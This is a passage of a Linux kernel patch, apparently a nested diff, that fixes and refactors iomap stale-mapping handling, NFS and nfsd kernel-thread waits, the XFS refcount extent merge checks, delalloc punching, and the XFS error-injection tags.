+ 		if (WARN_ON_ONCE(status == 0))
+@@ -906,6 +1156,8 @@ static loff_t iomap_zero_iter(struct iomap_iter *iter, bool *did_zero)
+ 		status = iomap_write_begin(iter, pos, bytes, &folio);
+ 		if (status)
+ 			return status;
++		if (iter->iomap.flags & IOMAP_F_STALE)
++			break;
+ 
+ 		offset = offset_in_folio(folio, pos);
+ 		if (bytes > folio_size(folio) - offset)
+diff --git a/fs/iomap/iter.c b/fs/iomap/iter.c
+index a1c7592d2aded..79a0614eaab77 100644
+--- a/fs/iomap/iter.c
++++ b/fs/iomap/iter.c
+@@ -7,12 +7,28 @@
+ #include <linux/iomap.h>
+ #include "trace.h"
+ 
++/*
++ * Advance to the next range we need to map.
++ *
++ * If the iomap is marked IOMAP_F_STALE, it means the existing map was not fully
++ * processed - it was aborted because the extent the iomap spanned may have been
++ * changed during the operation. In this case, the iteration behaviour is to
++ * remap the unprocessed range of the iter, and that means we may need to remap
++ * even when we've made no progress (i.e. iter->processed = 0). Hence the
++ * "finished iterating" case needs to distinguish between
++ * (processed = 0) meaning we are done and (processed = 0 && stale) meaning we
++ * need to remap the entire remaining range.
++ */
+ static inline int iomap_iter_advance(struct iomap_iter *iter)
+ {
++	bool stale = iter->iomap.flags & IOMAP_F_STALE;
++
+ 	/* handle the previous iteration (if any) */
+ 	if (iter->iomap.length) {
+-		if (iter->processed <= 0)
++		if (iter->processed < 0)
+ 			return iter->processed;
++		if (!iter->processed && !stale)
++			return 0;
+ 		if (WARN_ON_ONCE(iter->processed > iomap_length(iter)))
+ 			return -EIO;
+ 		iter->pos += iter->processed;
+@@ -33,6 +49,7 @@ static inline void iomap_iter_done(struct iomap_iter *iter)
+ 	WARN_ON_ONCE(iter->iomap.offset > iter->pos);
+ 	WARN_ON_ONCE(iter->iomap.length == 0);
+ 	WARN_ON_ONCE(iter->iomap.offset + iter->iomap.length <= iter->pos);
++	WARN_ON_ONCE(iter->iomap.flags & IOMAP_F_STALE);
+ 
+ 	trace_iomap_iter_dstmap(iter->inode, &iter->iomap);
+ 	if (iter->srcmap.type != IOMAP_HOLE)
+diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c
+index 456af7d230cf1..46a0a2d6962e1 100644
+--- a/fs/nfs/callback.c
++++ b/fs/nfs/callback.c
+@@ -80,9 +80,6 @@ nfs4_callback_svc(void *vrqstp)
+ 	set_freezable();
+ 
+ 	while (!kthread_freezable_should_stop(NULL)) {
+-
+-		if (signal_pending(current))
+-			flush_signals(current);
+ 		/*
+ 		 * Listen for a request on the socket
+ 		 */
+@@ -112,11 +109,7 @@ nfs41_callback_svc(void *vrqstp)
+ 	set_freezable();
+ 
+ 	while (!kthread_freezable_should_stop(NULL)) {
+-
+-		if (signal_pending(current))
+-			flush_signals(current);
+-
+-		prepare_to_wait(&serv->sv_cb_waitq, &wq, TASK_INTERRUPTIBLE);
++		prepare_to_wait(&serv->sv_cb_waitq, &wq, TASK_IDLE);
+ 		spin_lock_bh(&serv->sv_cb_lock);
+ 		if (!list_empty(&serv->sv_cb_list)) {
+ 			req = list_first_entry(&serv->sv_cb_list,
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index ba53cd89ec62c..b6d768bd5ccca 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1313,12 +1313,11 @@ static __be32 nfsd4_ssc_setup_dul(struct nfsd_net *nn, char *ipaddr,
+ 		/* found a match */
+ 		if (ni->nsui_busy) {
+ 			/*  wait - and try again */
+-			prepare_to_wait(&nn->nfsd_ssc_waitq, &wait,
+-				TASK_INTERRUPTIBLE);
++			prepare_to_wait(&nn->nfsd_ssc_waitq, &wait, TASK_IDLE);
+ 			spin_unlock(&nn->nfsd_ssc_lock);
+ 
+ 			/* allow 20secs for mount/unmount for now - revisit */
+-			if (signal_pending(current) ||
++			if (kthread_should_stop() ||
+ 					(schedule_timeout(20*HZ) == 0)) {
+ 				finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 				kfree(work);
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 0c75636054a54..a8190caf77f17 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -952,15 +952,6 @@ nfsd(void *vrqstp)
+ 
+ 	current->fs->umask = 0;
+ 
+-	/*
+-	 * thread is spawned with all signals set to SIG_IGN, re-enable
+-	 * the ones that will bring down the thread
+-	 */
+-	allow_signal(SIGKILL);
+-	allow_signal(SIGHUP);
+-	allow_signal(SIGINT);
+-	allow_signal(SIGQUIT);
+-
+ 	atomic_inc(&nfsdstats.th_cnt);
+ 
+ 	set_freezable();
+@@ -985,9 +976,6 @@ nfsd(void *vrqstp)
+ 		validate_process_creds();
+ 	}
+ 
+-	/* Clear signals before calling svc_exit_thread() */
+-	flush_signals(current);
+-
+ 	atomic_dec(&nfsdstats.th_cnt);
+ 
+ out:
+diff --git a/fs/xfs/libxfs/xfs_bmap.c b/fs/xfs/libxfs/xfs_bmap.c
+index 49d0d4ea63fcd..0d56a8d862e80 100644
+--- a/fs/xfs/libxfs/xfs_bmap.c
++++ b/fs/xfs/libxfs/xfs_bmap.c
+@@ -4058,7 +4058,7 @@ xfs_bmap_alloc_userdata(
+ 	 * the busy list.
+ 	 */
+ 	bma->datatype = XFS_ALLOC_NOBUSY;
+-	if (whichfork == XFS_DATA_FORK) {
++	if (whichfork == XFS_DATA_FORK || whichfork == XFS_COW_FORK) {
+ 		bma->datatype |= XFS_ALLOC_USERDATA;
+ 		if (bma->offset == 0)
+ 			bma->datatype |= XFS_ALLOC_INITIAL_USER_DATA;
+@@ -4551,7 +4551,8 @@ xfs_bmapi_convert_delalloc(
+ 	 * the extent.  Just return the real extent at this offset.
+ 	 */
+ 	if (!isnullstartblock(bma.got.br_startblock)) {
+-		xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags);
++		xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags,
++				xfs_iomap_inode_sequence(ip, flags));
+ 		*seq = READ_ONCE(ifp->if_seq);
+ 		goto out_trans_cancel;
+ 	}
+@@ -4599,7 +4600,8 @@ xfs_bmapi_convert_delalloc(
+ 	XFS_STATS_INC(mp, xs_xstrat_quick);
+ 
+ 	ASSERT(!isnullstartblock(bma.got.br_startblock));
+-	xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags);
++	xfs_bmbt_to_iomap(ip, iomap, &bma.got, 0, flags,
++				xfs_iomap_inode_sequence(ip, flags));
+ 	*seq = READ_ONCE(ifp->if_seq);
+ 
+ 	if (whichfork == XFS_COW_FORK)
+diff --git a/fs/xfs/libxfs/xfs_errortag.h b/fs/xfs/libxfs/xfs_errortag.h
+index 5362908164b0b..580ccbd5aadc2 100644
+--- a/fs/xfs/libxfs/xfs_errortag.h
++++ b/fs/xfs/libxfs/xfs_errortag.h
+@@ -40,13 +40,12 @@
+ #define XFS_ERRTAG_REFCOUNT_FINISH_ONE			25
+ #define XFS_ERRTAG_BMAP_FINISH_ONE			26
+ #define XFS_ERRTAG_AG_RESV_CRITICAL			27
++
+ /*
+- * DEBUG mode instrumentation to test and/or trigger delayed allocation
+- * block killing in the event of failed writes. When enabled, all
+- * buffered writes are silenty dropped and handled as if they failed.
+- * All delalloc blocks in the range of the write (including pre-existing
+- * delalloc blocks!) are tossed as part of the write failure error
+- * handling sequence.
++ * Drop-writes support removed because write error handling cannot trash
++ * pre-existing delalloc extents in any useful way anymore. We retain the
++ * definition so that we can reject it as an invalid value in
++ * xfs_errortag_valid().
+  */
+ #define XFS_ERRTAG_DROP_WRITES				28
+ #define XFS_ERRTAG_LOG_BAD_CRC				29
+@@ -95,7 +94,6 @@
+ #define XFS_RANDOM_REFCOUNT_FINISH_ONE			1
+ #define XFS_RANDOM_BMAP_FINISH_ONE			1
+ #define XFS_RANDOM_AG_RESV_CRITICAL			4
+-#define XFS_RANDOM_DROP_WRITES				1
+ #define XFS_RANDOM_LOG_BAD_CRC				1
+ #define XFS_RANDOM_LOG_ITEM_PIN				1
+ #define XFS_RANDOM_BUF_LRU_REF				2
+diff --git a/fs/xfs/libxfs/xfs_refcount.c b/fs/xfs/libxfs/xfs_refcount.c
+index 3f34bafe18dd1..6f7ed9288fe40 100644
+--- a/fs/xfs/libxfs/xfs_refcount.c
++++ b/fs/xfs/libxfs/xfs_refcount.c
+@@ -815,11 +815,136 @@ xfs_refcount_find_right_extents(
+ /* Is this extent valid? */
+ static inline bool
+ xfs_refc_valid(
+-	struct xfs_refcount_irec	*rc)
++	const struct xfs_refcount_irec	*rc)
+ {
+ 	return rc->rc_startblock != NULLAGBLOCK;
+ }
+ 
++static inline xfs_nlink_t
++xfs_refc_merge_refcount(
++	const struct xfs_refcount_irec	*irec,
++	enum xfs_refc_adjust_op		adjust)
++{
++	/* Once a record hits MAXREFCOUNT, it is pinned there forever */
++	if (irec->rc_refcount == MAXREFCOUNT)
++		return MAXREFCOUNT;
++	return irec->rc_refcount + adjust;
++}
++
++static inline bool
++xfs_refc_want_merge_center(
++	const struct xfs_refcount_irec	*left,
++	const struct xfs_refcount_irec	*cleft,
++	const struct xfs_refcount_irec	*cright,
++	const struct xfs_refcount_irec	*right,
++	bool				cleft_is_cright,
++	enum xfs_refc_adjust_op		adjust,
++	unsigned long long		*ulenp)
++{
++	unsigned long long		ulen = left->rc_blockcount;
++	xfs_nlink_t			new_refcount;
++
++	/*
++	 * To merge with a center record, both shoulder records must be
++	 * adjacent to the record we want to adjust.  This is only true if
++	 * find_left and find_right made all four records valid.
++	 */
++	if (!xfs_refc_valid(left)  || !xfs_refc_valid(right) ||
++	    !xfs_refc_valid(cleft) || !xfs_refc_valid(cright))
++		return false;
++
++	/* There must only be one record for the entire range. */
++	if (!cleft_is_cright)
++		return false;
++
++	/* The shoulder record refcounts must match the new refcount. */
++	new_refcount = xfs_refc_merge_refcount(cleft, adjust);
++	if (left->rc_refcount != new_refcount)
++		return false;
++	if (right->rc_refcount != new_refcount)
++		return false;
++
++	/*
++	 * The new record cannot exceed the max length.  ulen is a ULL as the
++	 * individual record block counts can be up to (u32 - 1) in length
++	 * hence we need to catch u32 addition overflows here.
++	 */
++	ulen += cleft->rc_blockcount + right->rc_blockcount;
++	if (ulen >= MAXREFCEXTLEN)
++		return false;
++
++	*ulenp = ulen;
++	return true;
++}
++
++static inline bool
++xfs_refc_want_merge_left(
++	const struct xfs_refcount_irec	*left,
++	const struct xfs_refcount_irec	*cleft,
++	enum xfs_refc_adjust_op		adjust)
++{
++	unsigned long long		ulen = left->rc_blockcount;
++	xfs_nlink_t			new_refcount;
++
++	/*
++	 * For a left merge, the left shoulder record must be adjacent to the
++	 * start of the range.  If this is true, find_left made left and cleft
++	 * contain valid contents.
++	 */
++	if (!xfs_refc_valid(left) || !xfs_refc_valid(cleft))
++		return false;
++
++	/* Left shoulder record refcount must match the new refcount. */
++	new_refcount = xfs_refc_merge_refcount(cleft, adjust);
++	if (left->rc_refcount != new_refcount)
++		return false;
++
++	/*
++	 * The new record cannot exceed the max length.  ulen is a ULL as the
++	 * individual record block counts can be up to (u32 - 1) in length
++	 * hence we need to catch u32 addition overflows here.
++	 */
++	ulen += cleft->rc_blockcount;
++	if (ulen >= MAXREFCEXTLEN)
++		return false;
++
++	return true;
++}
++
++static inline bool
++xfs_refc_want_merge_right(
++	const struct xfs_refcount_irec	*cright,
++	const struct xfs_refcount_irec	*right,
++	enum xfs_refc_adjust_op		adjust)
++{
++	unsigned long long		ulen = right->rc_blockcount;
++	xfs_nlink_t			new_refcount;
++
++	/*
++	 * For a right merge, the right shoulder record must be adjacent to the
++	 * end of the range.  If this is true, find_right made cright and right
++	 * contain valid contents.
++	 */
++	if (!xfs_refc_valid(right) || !xfs_refc_valid(cright))
++		return false;
++
++	/* Right shoulder record refcount must match the new refcount. */
++	new_refcount = xfs_refc_merge_refcount(cright, adjust);
++	if (right->rc_refcount != new_refcount)
++		return false;
++
++	/*
++	 * The new record cannot exceed the max length.  ulen is a ULL as the
++	 * individual record block counts can be up to (u32 - 1) in length
++	 * hence we need to catch u32 addition overflows here.
++	 */
++	ulen += cright->rc_blockcount;
++	if (ulen >= MAXREFCEXTLEN)
++		return false;
++
++	return true;
++}
++
+ /*
+  * Try to merge with any extents on the boundaries of the adjustment range.
+  */
+@@ -861,23 +986,15 @@ xfs_refcount_merge_extents(
+ 		 (cleft.rc_blockcount == cright.rc_blockcount);
+ 
+ 	/* Try to merge left, cleft, and right.  cleft must == cright. */
+-	ulen = (unsigned long long)left.rc_blockcount + cleft.rc_blockcount +
+-			right.rc_blockcount;
+-	if (xfs_refc_valid(&left) && xfs_refc_valid(&right) &&
+-	    xfs_refc_valid(&cleft) && xfs_refc_valid(&cright) && cequal &&
+-	    left.rc_refcount == cleft.rc_refcount + adjust &&
+-	    right.rc_refcount == cleft.rc_refcount + adjust &&
+-	    ulen < MAXREFCEXTLEN) {
++	if (xfs_refc_want_merge_center(&left, &cleft, &cright, &right, cequal,
++				adjust, &ulen)) {
+ 		*shape_changed = true;
+ 		return xfs_refcount_merge_center_extents(cur, &left, &cleft,
+ 				&right, ulen, aglen);
+ 	}
+ 
+ 	/* Try to merge left and cleft. */
+-	ulen = (unsigned long long)left.rc_blockcount + cleft.rc_blockcount;
+-	if (xfs_refc_valid(&left) && xfs_refc_valid(&cleft) &&
+-	    left.rc_refcount == cleft.rc_refcount + adjust &&
+-	    ulen < MAXREFCEXTLEN) {
++	if (xfs_refc_want_merge_left(&left, &cleft, adjust)) {
+ 		*shape_changed = true;
+ 		error = xfs_refcount_merge_left_extent(cur, &left, &cleft,
+ 				agbno, aglen);
+@@ -893,10 +1010,7 @@ xfs_refcount_merge_extents(
+ 	}
+ 
+ 	/* Try to merge cright and right. */
+-	ulen = (unsigned long long)right.rc_blockcount + cright.rc_blockcount;
+-	if (xfs_refc_valid(&right) && xfs_refc_valid(&cright) &&
+-	    right.rc_refcount == cright.rc_refcount + adjust &&
+-	    ulen < MAXREFCEXTLEN) {
++	if (xfs_refc_want_merge_right(&cright, &right, adjust)) {
+ 		*shape_changed = true;
+ 		return xfs_refcount_merge_right_extent(cur, &right, &cright,
+ 				aglen);
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index b6a584e044be0..bf2cca78304eb 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -266,7 +266,8 @@ xfs_validate_sb_write(
+ 		return -EFSCORRUPTED;
+ 	}
+ 
+-	if (xfs_sb_has_ro_compat_feature(sbp, XFS_SB_FEAT_RO_COMPAT_UNKNOWN)) {
++	if (!xfs_is_readonly(mp) &&
++	    xfs_sb_has_ro_compat_feature(sbp, XFS_SB_FEAT_RO_COMPAT_UNKNOWN)) {
+ 		xfs_alert(mp,
+ "Corruption detected in superblock read-only compatible features (0x%x)!",
+ 			(sbp->sb_features_ro_compat &
+@@ -973,7 +974,9 @@ xfs_log_sb(
+ 	 */
+ 	if (xfs_has_lazysbcount(mp)) {
+ 		mp->m_sb.sb_icount = percpu_counter_sum(&mp->m_icount);
+-		mp->m_sb.sb_ifree = percpu_counter_sum(&mp->m_ifree);
++		mp->m_sb.sb_ifree = min_t(uint64_t,
++				percpu_counter_sum(&mp->m_ifree),
++				mp->m_sb.sb_icount);
+ 		mp->m_sb.sb_fdblocks = percpu_counter_sum(&mp->m_fdblocks);
+ 	}
+ 
+diff --git a/fs/xfs/xfs_aops.c b/fs/xfs/xfs_aops.c
+index 5d1a995b15f83..21c241e96d483 100644
+--- a/fs/xfs/xfs_aops.c
++++ b/fs/xfs/xfs_aops.c
+@@ -114,9 +114,8 @@ xfs_end_ioend(
+ 	if (unlikely(error)) {
+ 		if (ioend->io_flags & IOMAP_F_SHARED) {
+ 			xfs_reflink_cancel_cow_range(ip, offset, size, true);
+-			xfs_bmap_punch_delalloc_range(ip,
+-						      XFS_B_TO_FSBT(mp, offset),
+-						      XFS_B_TO_FSB(mp, size));
++			xfs_bmap_punch_delalloc_range(ip, offset,
++					offset + size);
+ 		}
+ 		goto done;
+ 	}
+@@ -373,7 +372,7 @@ xfs_map_blocks(
+ 	    isnullstartblock(imap.br_startblock))
+ 		goto allocate_blocks;
+ 
+-	xfs_bmbt_to_iomap(ip, &wpc->iomap, &imap, 0, 0);
++	xfs_bmbt_to_iomap(ip, &wpc->iomap, &imap, 0, 0, XFS_WPC(wpc)->data_seq);
+ 	trace_xfs_map_blocks_found(ip, offset, count, whichfork, &imap);
+ 	return 0;
+ allocate_blocks:
+@@ -440,27 +439,25 @@ xfs_prepare_ioend(
+ }
+ 
+ /*
+- * If the page has delalloc blocks on it, we need to punch them out before we
+- * invalidate the page.  If we don't, we leave a stale delalloc mapping on the
+- * inode that can trip up a later direct I/O read operation on the same region.
++ * If the folio has delalloc blocks on it, the caller is asking us to punch them
++ * out. If we don't, we can leave a stale delalloc mapping covered by a clean
++ * page that needs to be dirtied again before the delalloc mapping can be
++ * converted. This stale delalloc mapping can trip up a later direct I/O read
++ * operation on the same region.
+  *
+- * We prevent this by truncating away the delalloc regions on the page.  Because
++ * We prevent this by truncating away the delalloc regions on the folio. Because
+  * they are delalloc, we can do this without needing a transaction. Indeed - if
+  * we get ENOSPC errors, we have to be able to do this truncation without a
+- * transaction as there is no space left for block reservation (typically why we
+- * see a ENOSPC in writeback).
++ * transaction as there is no space left for block reservation (typically why
++ * we see a ENOSPC in writeback).
+  */
+ static void
+ xfs_discard_folio(
+ 	struct folio		*folio,
+ 	loff_t			pos)
+ {
+-	struct inode		*inode = folio->mapping->host;
+-	struct xfs_inode	*ip = XFS_I(inode);
++	struct xfs_inode	*ip = XFS_I(folio->mapping->host);
+ 	struct xfs_mount	*mp = ip->i_mount;
+-	size_t			offset = offset_in_folio(folio, pos);
+-	xfs_fileoff_t		start_fsb = XFS_B_TO_FSBT(mp, pos);
+-	xfs_fileoff_t		pageoff_fsb = XFS_B_TO_FSBT(mp, offset);
+ 	int			error;
+ 
+ 	if (xfs_is_shutdown(mp))
+@@ -470,8 +467,14 @@ xfs_discard_folio(
+ 		"page discard on page "PTR_FMT", inode 0x%llx, pos %llu.",
+ 			folio, ip->i_ino, pos);
+ 
+-	error = xfs_bmap_punch_delalloc_range(ip, start_fsb,
+-			i_blocks_per_folio(inode, folio) - pageoff_fsb);
++	/*
++	 * The end of the punch range is always the offset of the the first
++	 * byte of the next folio. Hence the end offset is only dependent on the
++	 * folio itself and not the start offset that is passed in.
++	 */
++	error = xfs_bmap_punch_delalloc_range(ip, pos,
++				folio_pos(folio) + folio_size(folio));
++
+ 	if (error && !xfs_is_shutdown(mp))
+ 		xfs_alert(mp, "page discard unable to remove delalloc mapping.");
+ }
+diff --git a/fs/xfs/xfs_bmap_util.c b/fs/xfs/xfs_bmap_util.c
+index 04d0c2bff67c4..867645b74d889 100644
+--- a/fs/xfs/xfs_bmap_util.c
++++ b/fs/xfs/xfs_bmap_util.c
+@@ -590,11 +590,13 @@ xfs_getbmap(
+ int
+ xfs_bmap_punch_delalloc_range(
+ 	struct xfs_inode	*ip,
+-	xfs_fileoff_t		start_fsb,
+-	xfs_fileoff_t		length)
++	xfs_off_t		start_byte,
++	xfs_off_t		end_byte)
+ {
++	struct xfs_mount	*mp = ip->i_mount;
+ 	struct xfs_ifork	*ifp = &ip->i_df;
+-	xfs_fileoff_t		end_fsb = start_fsb + length;
++	xfs_fileoff_t		start_fsb = XFS_B_TO_FSBT(mp, start_byte);
++	xfs_fileoff_t		end_fsb = XFS_B_TO_FSB(mp, end_byte);
+ 	struct xfs_bmbt_irec	got, del;
+ 	struct xfs_iext_cursor	icur;
+ 	int			error = 0;
+@@ -607,7 +609,7 @@ xfs_bmap_punch_delalloc_range(
+ 
+ 	while (got.br_startoff + got.br_blockcount > start_fsb) {
+ 		del = got;
+-		xfs_trim_extent(&del, start_fsb, length);
++		xfs_trim_extent(&del, start_fsb, end_fsb - start_fsb);
+ 
+ 		/*
+ 		 * A delete can push the cursor forward. Step back to the
+diff --git a/fs/xfs/xfs_bmap_util.h b/fs/xfs/xfs_bmap_util.h
+index 24b37d211f1dc..6888078f5c31e 100644
+--- a/fs/xfs/xfs_bmap_util.h
++++ b/fs/xfs/xfs_bmap_util.h
+@@ -31,7 +31,7 @@ xfs_bmap_rtalloc(struct xfs_bmalloca *ap)
+ #endif /* CONFIG_XFS_RT */
+ 
+ int	xfs_bmap_punch_delalloc_range(struct xfs_inode *ip,
+-		xfs_fileoff_t start_fsb, xfs_fileoff_t length);
++		xfs_off_t start_byte, xfs_off_t end_byte);
+ 
+ struct kgetbmap {
+ 	__s64		bmv_offset;	/* file offset of segment in blocks */
+diff --git a/fs/xfs/xfs_buf.c b/fs/xfs/xfs_buf.c
+index dde346450952a..54c774af6e1c6 100644
+--- a/fs/xfs/xfs_buf.c
++++ b/fs/xfs/xfs_buf.c
+@@ -1945,6 +1945,7 @@ xfs_free_buftarg(
+ 	list_lru_destroy(&btp->bt_lru);
+ 
+ 	blkdev_issue_flush(btp->bt_bdev);
++	invalidate_bdev(btp->bt_bdev);
+ 	fs_put_dax(btp->bt_daxdev, btp->bt_mount);
+ 
+ 	kmem_free(btp);
+diff --git a/fs/xfs/xfs_buf_item.c b/fs/xfs/xfs_buf_item.c
+index 522d450a94b18..df7322ed73fa9 100644
+--- a/fs/xfs/xfs_buf_item.c
++++ b/fs/xfs/xfs_buf_item.c
+@@ -1018,6 +1018,8 @@ xfs_buf_item_relse(
+ 	trace_xfs_buf_item_relse(bp, _RET_IP_);
+ 	ASSERT(!test_bit(XFS_LI_IN_AIL, &bip->bli_item.li_flags));
+ 
++	if (atomic_read(&bip->bli_refcount))
++		return;
+ 	bp->b_log_item = NULL;
+ 	xfs_buf_rele(bp);
+ 	xfs_buf_item_free(bip);
+diff --git a/fs/xfs/xfs_error.c b/fs/xfs/xfs_error.c
+index c6b2aabd6f187..dea3c0649d2f7 100644
+--- a/fs/xfs/xfs_error.c
++++ b/fs/xfs/xfs_error.c
+@@ -46,7 +46,7 @@ static unsigned int xfs_errortag_random_default[] = {
+ 	XFS_RANDOM_REFCOUNT_FINISH_ONE,
+ 	XFS_RANDOM_BMAP_FINISH_ONE,
+ 	XFS_RANDOM_AG_RESV_CRITICAL,
+-	XFS_RANDOM_DROP_WRITES,
++	0, /* XFS_RANDOM_DROP_WRITES has been removed */
+ 	XFS_RANDOM_LOG_BAD_CRC,
+ 	XFS_RANDOM_LOG_ITEM_PIN,
+ 	XFS_RANDOM_BUF_LRU_REF,
+@@ -162,7 +162,6 @@ XFS_ERRORTAG_ATTR_RW(refcount_continue_update,	XFS_ERRTAG_REFCOUNT_CONTINUE_UPDA
+ XFS_ERRORTAG_ATTR_RW(refcount_finish_one,	XFS_ERRTAG_REFCOUNT_FINISH_ONE);
+ XFS_ERRORTAG_ATTR_RW(bmap_finish_one,	XFS_ERRTAG_BMAP_FINISH_ONE);
+ XFS_ERRORTAG_ATTR_RW(ag_resv_critical,	XFS_ERRTAG_AG_RESV_CRITICAL);
+-XFS_ERRORTAG_ATTR_RW(drop_writes,	XFS_ERRTAG_DROP_WRITES);
+ XFS_ERRORTAG_ATTR_RW(log_bad_crc,	XFS_ERRTAG_LOG_BAD_CRC);
+ XFS_ERRORTAG_ATTR_RW(log_item_pin,	XFS_ERRTAG_LOG_ITEM_PIN);
+ XFS_ERRORTAG_ATTR_RW(buf_lru_ref,	XFS_ERRTAG_BUF_LRU_REF);
+@@ -206,7 +205,6 @@ static struct attribute *xfs_errortag_attrs[] = {
+ 	XFS_ERRORTAG_ATTR_LIST(refcount_finish_one),
+ 	XFS_ERRORTAG_ATTR_LIST(bmap_finish_one),
+ 	XFS_ERRORTAG_ATTR_LIST(ag_resv_critical),
+-	XFS_ERRORTAG_ATTR_LIST(drop_writes),
+ 	XFS_ERRORTAG_ATTR_LIST(log_bad_crc),
+ 	XFS_ERRORTAG_ATTR_LIST(log_item_pin),
+ 	XFS_ERRORTAG_ATTR_LIST(buf_lru_ref),
+@@ -256,6 +254,19 @@ xfs_errortag_del(
+ 	kmem_free(mp->m_errortag);
+ }
+ 
++static bool
++xfs_errortag_valid(
++	unsigned int		error_tag)
++{
++	if (error_tag >= XFS_ERRTAG_MAX)
++		return false;
++
++	/* Error out removed injection types */
++	if (error_tag == XFS_ERRTAG_DROP_WRITES)
++		return false;
++	return true;
++}
++
+ bool
+ xfs_errortag_test(
+ 	struct xfs_mount	*mp,
+@@ -277,7 +288,9 @@ xfs_errortag_test(
+ 	if (!mp->m_errortag)
+ 		return false;
+ 
+-	ASSERT(error_tag < XFS_ERRTAG_MAX);
++	if (!xfs_errortag_valid(error_tag))
++		return false;
++
+ 	randfactor = mp->m_errortag[error_tag];
+ 	if (!randfactor || prandom_u32_max(randfactor))
+ 		return false;
+@@ -293,7 +306,7 @@ xfs_errortag_get(
+ 	struct xfs_mount	*mp,
+ 	unsigned int		error_tag)
+ {
+-	if (error_tag >= XFS_ERRTAG_MAX)
++	if (!xfs_errortag_valid(error_tag))
+ 		return -EINVAL;
+ 
+ 	return mp->m_errortag[error_tag];
+@@ -305,7 +318,7 @@ xfs_errortag_set(
+ 	unsigned int		error_tag,
+ 	unsigned int		tag_value)
+ {
+-	if (error_tag >= XFS_ERRTAG_MAX)
++	if (!xfs_errortag_valid(error_tag))
+ 		return -EINVAL;
+ 
+ 	mp->m_errortag[error_tag] = tag_value;
+@@ -319,7 +332,7 @@ xfs_errortag_add(
+ {
+ 	BUILD_BUG_ON(ARRAY_SIZE(xfs_errortag_random_default) != XFS_ERRTAG_MAX);
+ 
+-	if (error_tag >= XFS_ERRTAG_MAX)
++	if (!xfs_errortag_valid(error_tag))
+ 		return -EINVAL;
+ 
+ 	return xfs_errortag_set(mp, error_tag,
+diff --git a/fs/xfs/xfs_file.c b/fs/xfs/xfs_file.c
+index e462d39c840e6..595a5bcf46b94 100644
+--- a/fs/xfs/xfs_file.c
++++ b/fs/xfs/xfs_file.c
+@@ -1325,7 +1325,7 @@ __xfs_filemap_fault(
+ 		if (write_fault) {
+ 			xfs_ilock(XFS_I(inode), XFS_MMAPLOCK_SHARED);
+ 			ret = iomap_page_mkwrite(vmf,
+-					&xfs_buffered_write_iomap_ops);
++					&xfs_page_mkwrite_iomap_ops);
+ 			xfs_iunlock(XFS_I(inode), XFS_MMAPLOCK_SHARED);
+ 		} else {
+ 			ret = filemap_fault(vmf);
+diff --git a/fs/xfs/xfs_fsops.c b/fs/xfs/xfs_fsops.c
+index 13851c0d640bc..332da0d7b85cf 100644
+--- a/fs/xfs/xfs_fsops.c
++++ b/fs/xfs/xfs_fsops.c
+@@ -129,6 +129,10 @@ xfs_growfs_data_private(
+ 	if (delta < 0 && nagcount < 2)
+ 		return -EINVAL;
+ 
++	/* No work to do */
++	if (delta == 0)
++		return 0;
++
+ 	oagcount = mp->m_sb.sb_agcount;
+ 	/* allocate the new per-ag structures */
+ 	if (nagcount > oagcount) {
+diff --git a/fs/xfs/xfs_icache.c b/fs/xfs/xfs_icache.c
+index d884cba1d7072..dd5a664c294f5 100644
+--- a/fs/xfs/xfs_icache.c
++++ b/fs/xfs/xfs_icache.c
+@@ -342,6 +342,9 @@ xfs_iget_recycle(
+ 
+ 	trace_xfs_iget_recycle(ip);
+ 
++	if (!xfs_ilock_nowait(ip, XFS_ILOCK_EXCL))
++		return -EAGAIN;
++
+ 	/*
+ 	 * We need to make it look like the inode is being reclaimed to prevent
+ 	 * the actual reclaim workers from stomping over us while we recycle
+@@ -355,6 +358,7 @@ xfs_iget_recycle(
+ 
+ 	ASSERT(!rwsem_is_locked(&inode->i_rwsem));
+ 	error = xfs_reinit_inode(mp, inode);
++	xfs_iunlock(ip, XFS_ILOCK_EXCL);
+ 	if (error) {
+ 		/*
+ 		 * Re-initializing the inode failed, and we are in deep
+@@ -523,6 +527,8 @@ xfs_iget_cache_hit(
+ 	if (ip->i_flags & XFS_IRECLAIMABLE) {
+ 		/* Drops i_flags_lock and RCU read lock. */
+ 		error = xfs_iget_recycle(pag, ip);
++		if (error == -EAGAIN)
++			goto out_skip;
+ 		if (error)
+ 			return error;
+ 	} else {
+diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c
+index aa303be11576f..54b707787f907 100644
+--- a/fs/xfs/xfs_inode.c
++++ b/fs/xfs/xfs_inode.c
+@@ -1652,8 +1652,11 @@ xfs_inode_needs_inactive(
+ 	if (VFS_I(ip)->i_mode == 0)
+ 		return false;
+ 
+-	/* If this is a read-only mount, don't do this (would generate I/O) */
+-	if (xfs_is_readonly(mp))
++	/*
++	 * If this is a read-only mount, don't do this (would generate I/O)
++	 * unless we're in log recovery and cleaning the iunlinked list.
++	 */
++	if (xfs_is_readonly(mp) && !xlog_recovery_needed(mp->m_log))
+ 		return false;
+ 
+ 	/* If the log isn't running, push inodes straight to reclaim. */
+@@ -1713,8 +1716,11 @@ xfs_inactive(
+ 	mp = ip->i_mount;
+ 	ASSERT(!xfs_iflags_test(ip, XFS_IRECOVERY));
+ 
+-	/* If this is a read-only mount, don't do this (would generate I/O) */
+-	if (xfs_is_readonly(mp))
++	/*
++	 * If this is a read-only mount, don't do this (would generate I/O)
++	 * unless we're in log recovery and cleaning the iunlinked list.
++	 */
++	if (xfs_is_readonly(mp) && !xlog_recovery_needed(mp->m_log))
+ 		goto out;
+ 
+ 	/* Metadata inodes require explicit resource cleanup. */
+@@ -2479,7 +2485,7 @@ xfs_remove(
+ 			error = xfs_dir_replace(tp, ip, &xfs_name_dotdot,
+ 					tp->t_mountp->m_sb.sb_rootino, 0);
+ 			if (error)
+-				return error;
